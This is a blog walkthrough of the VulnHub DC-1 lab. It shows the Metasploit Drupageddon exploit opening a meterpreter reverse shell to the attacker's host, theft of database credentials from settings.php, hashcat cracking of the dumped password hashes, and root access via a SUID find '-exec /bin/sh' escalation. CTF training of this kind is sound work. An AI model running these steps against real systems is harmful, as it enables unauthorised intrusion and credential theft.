VulnHub DC-1

Vulnhub DC-1 CTF Hacking Challenge. With DC-1 machine from Vulnhub we learn Hacking a bit more closely like you are hacking a real machine.

I have discussed all the steps and screenshots along with the output here , which will reduce any confusion , the writeup may seem long due to many screenshots but is actually a 10 minutes to do thing.

Download the VulnHub DC-1 Machine – https://www.vulnhub.com/entry/dc-1,292/

NOTE: I have revisited the post and updated few things, so if you notice the difference in pic and text, don’t worry about msf5–>msf6 and dc-1–> dc-1.vulnhub.

Discover machine on network by netdiscover or nmap range scanning
netdiscover your whole network or if you know the interface on which vmware is connected vmnet0, vmnet1 (Host-Only) or vmnet8(NAT)
netdiscover -i vmnet8
Added machine IP to /hosts file with name dc-1
now run nmap scan to get what are the ports open, services running and their version numbers

root@ETHICALHACKX:~# nmap -sV -p- -T5 -Pn -A dc-1.vulnhub
-SV to get the services and version number of services
-p- to scan all ports
-T5 to scan at insane speed, donot do this in production environment as any basic firewall IPS/IDS will detect this, you may go with -T3 or lower.
-Pn no ping as we know the host is up
-A for aggressive scan
dc-1 is machine name I put in hosts file against the IP, you may use the IP address here

Now on running the nmap command in terminal the Output is

┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/dc-1]
└─$ sudo nmap -sC -sV -A -T5 -O -p- dc-1.vulnhub
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:14 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for dc-1.vulnhub (192.168.56.104)
Host is up (0.0020s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35046/tcp6  status
|   100024  1          46089/udp   status
|   100024  1          47523/udp6  status
|_  100024  1          49565/tcp   status
49565/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:AA:94:9F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.00 ms dc-1.vulnhub (192.168.56.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.07 seconds
nmap scan of dc-1

So from above nmap result we see we have Drupal 7 hosted at port 80
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian)) Running Drupal
111/tcp open rpcbind 2-4 (RPC #100000)

We have some attack surface here and we proceed with Drupal, opening the Mahcine IP in our browser to explore Drupal 7.
We can try some user enumeration to see if we are lucky on Drupal Login page.
Or jump to exploits to see if we have anything in our arsenal against Drupal 7.

Vulnhub DC-1 Drupal 7

In metasploit we search Drupal Exploits, fire up Metasploit by msfconsole.

┌──(abhinav㉿ETHICALHACKX)-[~/vulnhub/dc-1]
└─$ msfconsole
[!] The following modules could not be loaded!..-
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] Please see /home/abhinav/.msf4/logs/framework.log for details.
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.0.44-dev                          ]
+ -- --=[ 2131 exploits - 1139 auxiliary - 363 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to 
check out the result of hosts and services

msf6 > 
search drupal
Search drupal in metasploit

From the list we get, we choose one of the exploits and use it by use exploit.

msf6 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

We should choose one with Rank Excellent, altough not mandatory.
So we choose – > exploit/multi/http/drupal_drupageddon
in msfconsole type – use exploit/multi/http/drupal_drupageddon
To see available options in this particular exploit type show options.

msf5 > use exploit/multi/http/drupal_drupageddon
 msf5 exploit(multi/http/drupal_drupageddon) > show options
 Module options (exploit/multi/http/drupal_drupageddon):
 Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][…]
    RHOSTS                      yes       The target address range or CIDR identifier
    RPORT      80               yes       The target port (TCP)
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The target URI of the Drupal installation
    VHOST                       no        HTTP server virtual host
 Exploit target:
 Id  Name
    --  ----
    0   Drupal 7.0 - 7.31 (form-cache PHP injection method)

set RHOST as dc-1 or the machine IP

msf5 exploit(multi/http/drupal_drupageddon) > set rhost dc-1
 rhost => dc-1
msf6 exploit(unix/webapp/drupal_coder_exec) > use exploit/multi/http/drupal_drupageddon
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/drupal_drupageddon) > show options

Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)


msf6 exploit(multi/http/drupal_drupageddon) > set RHOSTS dc-1.vulnhub
RHOSTS => dc-1.vulnhub
msf6 exploit(multi/http/drupal_drupageddon) > set LHOST 192.168.56.102
LHOST => 192.168.56.102

Now we are all set to launch the exploit so type run or exploit.

msf6 exploit(multi/http/drupal_drupageddon) > run

[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Sending stage (39282 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.104:34178) at 2021-05-24 21:35:31 -0400

meterpreter > 

Finally we have a reverse meterpreter shell here.So once we are in the machine the one thing to do is find who you are : user, this will let us know our permission. Type getuid

meterpreter > getuid
 Server username: www-data (33)

Going through files in current directory by ‘ls’ gave us our first flag1.txt

meterpreter > ls
 Listing: /var/www
 .
 .
flag1

Viewing the contents of flag1.txt we get another hint. Pointing towards the Drupal CMS Config file.

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
meterpreter > getuid
Server username: www-data (33)
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-20 15:45:59 -0500  .gitignore
100644/rw-r--r--  5767   fil   2013-11-20 15:45:59 -0500  .htaccess
100644/rw-r--r--  1481   fil   2013-11-20 15:45:59 -0500  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-20 15:45:59 -0500  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-20 15:45:59 -0500  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-20 15:45:59 -0500  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-20 15:45:59 -0500  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 06:14:15 -0400  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-20 15:45:59 -0500  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-20 15:45:59 -0500  README.txt
100644/rw-r--r--  9642   fil   2013-11-20 15:45:59 -0500  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-20 15:45:59 -0500  authorize.php
100644/rw-r--r--  720    fil   2013-11-20 15:45:59 -0500  cron.php
100644/rw-r--r--  52     fil   2019-02-19 08:20:46 -0500  flag1.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  includes
100644/rw-r--r--  529    fil   2013-11-20 15:45:59 -0500  index.php
100644/rw-r--r--  703    fil   2013-11-20 15:45:59 -0500  install.php
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  misc
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  modules
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  profiles
100644/rw-r--r--  1561   fil   2013-11-20 15:45:59 -0500  robots.txt
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  scripts
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  sites
40755/rwxr-xr-x   4096   dir   2013-11-20 15:45:59 -0500  themes
100644/rw-r--r--  19941  fil   2013-11-20 15:45:59 -0500  update.php
100644/rw-r--r--  2178   fil   2013-11-20 15:45:59 -0500  web.config
100644/rw-r--r--  417    fil   2013-11-20 15:45:59 -0500  xmlrpc.php

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
meterpreter > 

I searched on Google to know that Drupal Config File is at – sites/default/settings.php

meterpreter > cd sites/default
 meterpreter > ls
 Listing: /var/www/sites/default
 Mode              Size   Type  Last modified              Name
 ----              ----   ----  -------------              ----
 100644/rw-r--r--  23202  fil   2013-11-21 02:15:59 +0530  default.settings.php
 40775/rwxrwxr-x   4096   dir   2019-02-19 18:40:31 +0530  files
 100444/r--r--r--  15989  fil   2019-02-19 19:18:01 +0530  settings.php

We view the content of file settings.php again we type cat settings.php

meterpreter > cat settings.php
 <?php
 /**
  *
 flag2
 Brute force and dictionary attacks aren't the
 only ways to gain access (and you WILL need access).
 What can you do with these credentials?
 *
 */ 
 $databases = array (
   'default' => 
   array (
     'default' => 
     array (
       'database' => 'drupaldb',
       'username' => 'dbuser',
       'password' => 'R0ck3t',
       'host' => 'localhost',
       'port' => '',
       'driver' => 'mysql',
       'prefix' => '',

Here we get our second flag on top of the file, which is also the username and password to drupal database of dc-1

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

We spawn a python shell to access database, a ttp or pseudo-tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

We browse the drupal database now. Find something worth here.

meterpreter > shell
Process 3436 created.
Channel 2 created.
python -c 'import pty; pty.spawn("/bin/sh")'
$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 137

Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;

show databases;
+--------------------+

| Database           |

+--------------------+

| information_schema |

| drupaldb           |

+--------------------+

2 rows in set (0.00 sec)

So we explore drupal db further, we might have some usernames and passwords here.

mysql> use drupaldb;
 use drupaldb;
 Reading table information for completion of table and column names
 You can turn off this feature to get a quicker startup with -A
 Database changed
 mysql> 
 We try to find something useful in Drupladb database, like users table.
 mysql> show tables;
 show tables;
 +-----------------------------+
 | Tables_in_drupaldb          |
 +-----------------------------+
 | actions                     |
 | authmap                     |
 | batch                       |
 | block                       |
 | block_custom                |
 | block_node_type             |
 | block_role                  |
 | blocked_ips                 |
 | cache                       |
 | cache_block                 |
 | cache_bootstrap             |
 | cache_field                 |
 | cache_filter                |
 | cache_form                  |
 | cache_image                 |
 | cache_menu                  |
 | cache_page                  |
 | cache_path                  |
 | cache_update                |
 | cache_views                 |
 | cache_views_data            |
 | comment                     |
 | ctools_css_cache            |
 | ctools_object_cache         |
 | date_format_locale          |
 | date_format_type            |
 | date_formats                |
 | field_config                |
 | field_config_instance       |
 | field_data_body             |
 | field_data_comment_body     |
 | field_data_field_image      |
 | field_data_field_tags       |
 | field_revision_body         |
 | field_revision_comment_body |
 | field_revision_field_image  |
 | field_revision_field_tags   |
 | file_managed                |
 | file_usage                  |
 | filter                      |
 | filter_format               |
 | flood                       |
 | history                     |
 | image_effects               |
 | image_styles                |
 | menu_custom                 |
 | menu_links                  |
 | menu_router                 |
 | node                        |
 | node_access                 |
 | node_comment_statistics     |
 | node_revision               |
 | node_type                   |
 | queue                       |
 | rdf_mapping                 |
 | registry                    |
 | registry_file               |
 | role                        |
 | role_permission             |
 | search_dataset              |
 | search_index                |
 | search_node_links           |
 | search_total                |
 | semaphore                   |
 | sequences                   |
 | sessions                    |
 | shortcut_set                |
 | shortcut_set_users          |
 | system                      |
 | taxonomy_index              |
 | taxonomy_term_data          |
 | taxonomy_term_hierarchy     |
 | taxonomy_vocabulary         |
 | url_alias                   |
 | users                       |
 | users_roles                 |
 | variable                    |
 | views_display               |
 | views_view                  |
 | watchdog                    |
 +-----------------------------+
 80 rows in set (0.00 sec)

We check the users table if we get anything here.

mysql> select * from users;
 select * from users;
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 | uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 |   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
 |   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1563777450 | 1563777450 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
 |   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 3 rows in set (0.00 sec)

So we have username and password in hash form here which we will ofcourse try to decode by hashcat or any other application of your choice, which you prefer.

I have copied the hash into a seperate file say hash.txt and I will use one of the Kali Linux default wordlist – rockyou.txt. You can locate rockyou .txt by locate rockyou.txt

root@ETHICALHACKX:~# hashcat -m 7900 hash.txt rockyou.txt

After the hash is decrypted we know the admins password is – 53cr3t

So now we login to Drupal Website of dc-1 and explore further , under contents menu we find the third flag – flag3 which says

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

The SUID bit allows an application to be run as root, even when a different user is running it. So run the command to find out.

find / -perm -u=s -type f 2>/dev/null
mysql> exit                                 
 exit
 Bye
 $ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /bin/mount
 /bin/ping
 /bin/su
 /bin/ping6
 /bin/umount
 /usr/bin/at
 /usr/bin/chsh
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/procmail
 /usr/bin/find
 /usr/sbin/exim4
 /usr/lib/pt_chown
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /sbin/mount.nfs

So we see find command has SUID bit set, means we can execute find command as root, we earlier saw we are actually www-data , but executing find will run it as root.

We take a look at passwd file, that is always an interesting thing to do in Linux.

pwd
 /var/www/sites/default
 $ cat /etc/passwd
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 statd:x:102:65534::/var/lib/nfs:/bin/false
 messagebus:x:103:107::/var/run/dbus:/bin/false
 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

Guess what, we see flag4 in passwd file. So we again crack the password , which is a hash. Same as earlier use john or hashcat….

the flag4 values are altered in pic because I was having fun with the machine.

Now the final flag, lets navigate to /root. and We see an error, so lets elevate our privileges. Lets check if we can.

find ethicalhackx -exec "/bin/sh" \;

now check user by whoami — and we are root
Lets get the final flag.

whoami 
root
pwd
/tmp
cd ..
cd root
ls
thefinalflag.txt
cat thefinalflag.txt
Well done!!!! Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

So this Vulnhub machine is done, we will post more interesting CTFs soon. and each steps in every CTF will be covered in detail in a separate post.

LEAVE A REPLY

Please enter your comment!
Please enter your name here